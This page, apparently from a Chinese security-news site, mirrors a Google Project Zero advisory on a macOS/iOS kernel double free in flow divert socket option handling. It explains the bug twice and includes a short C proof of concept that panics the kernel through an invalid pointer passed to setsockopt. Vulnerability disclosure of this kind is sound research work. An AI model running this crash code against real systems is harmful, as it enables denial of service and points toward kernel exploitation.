首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
macOS/iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket
来源:Google Security Research 作者:Google 发布时间:2017-12-13  
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1373
 
SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by
 
  flow_divert_token_set(struct socket *so, struct sockopt *sopt)
 
in flow_divert.c.
 
The relevant code is:
 
  error = soopt_getm(sopt, &token);
  if (error) {
    goto done;
  }
  
  error = soopt_mcopyin(sopt, token);
  if (error) {
    goto done;
  }
 
...
 
done:
  if (token != NULL) {
    mbuf_freem(token);
  }
 
soopt_getm allocates an mbuf.
 
soopt_mcopyin, which should copyin the data for the mbuf from userspace, has the following code:
 
      error = copyin(sopt->sopt_val, mtod(m, char *),
          m->m_len);
      if (error != 0) {
        m_freem(m0);
        return (error);
      }
 
This means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin
will free the mbuf. flow_divert_token_set isn't aware of these semantics and if it sees that soopt_mcopyin
returns an error it also calls mbuf_freem on that same mbuf which soopy_mcopyin already freed.
 
mbufs are aggressivly cached but with sufficiently full caches m_freem will eventually fall through to freeing
back to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually
exploit such an issue.
 
This PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect
all double frees and this issue is still exploitable with sufficient grooming/cache manipulation.
 
Tested on MacOS 10.13 (17A365) on MacBookAir5,2
*/
 
// ianbeer
 
#if 0
MacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling
 
SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by
 
  flow_divert_token_set(struct socket *so, struct sockopt *sopt)
 
in flow_divert.c.
 
The relevant code is:
 
  error = soopt_getm(sopt, &token);
  if (error) {
    goto done;
  }
  
  error = soopt_mcopyin(sopt, token);
  if (error) {
    goto done;
  }
 
...
 
done:
  if (token != NULL) {
    mbuf_freem(token);
  }
 
soopt_getm allocates an mbuf.
 
soopt_mcopyin, which should copyin the data for the mbuf from userspace, has the following code:
 
            error = copyin(sopt->sopt_val, mtod(m, char *),
                m->m_len);
            if (error != 0) {
                m_freem(m0);
                return (error);
            }
 
This means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin
will free the mbuf. flow_divert_token_set isn't aware of these semantics and if it sees that soopt_mcopyin
returns an error it also calls mbuf_freem on that same mbuf which soopy_mcopyin already freed.
 
mbufs are aggressivly cached but with sufficiently full caches m_freem will eventually fall through to freeing
back to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually
exploit such an issue.
 
This PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect
all double frees and this issue is still exploitable with sufficient grooming/cache manipulation.
 
Tested on MacOS 10.13 (17A365) on MacBookAir5,2
#endif
 
#include <stdlib.h>
#include <stdio.h>
 
#include <sys/socket.h>
 
int main() {
  int sock = socket(PF_INET, SOCK_DGRAM, 0);
  if (socket < 0) {
    printf("failed to create socket\n");
    return 0;
  }
 
  printf("socket: %d\n", sock);
 
  setsockopt(sock, SOL_SOCKET, 0x1106, (void*)424242424242, 100);
 
  return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·macOS - Kernel Code Execution
·glibc ld.so - Memory Leak / Bu
·macOS/iOS - Multiple Kernel Us
·pfSense 2.4.1 CSRF Error Page
·macOS getrusage Stack Leak
·Advantech WebAccess 8.2 Stack
·macOS necp_get_socket_attribut
·Dup Scout Enterprise 10.0.18 B
·macOS XNU Kernel - Memory Disc
·Microsoft Office DDE Payload D
·MikroTik 6.40.5 ICMP - Denial
·Western Digital MyCloud multi_
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved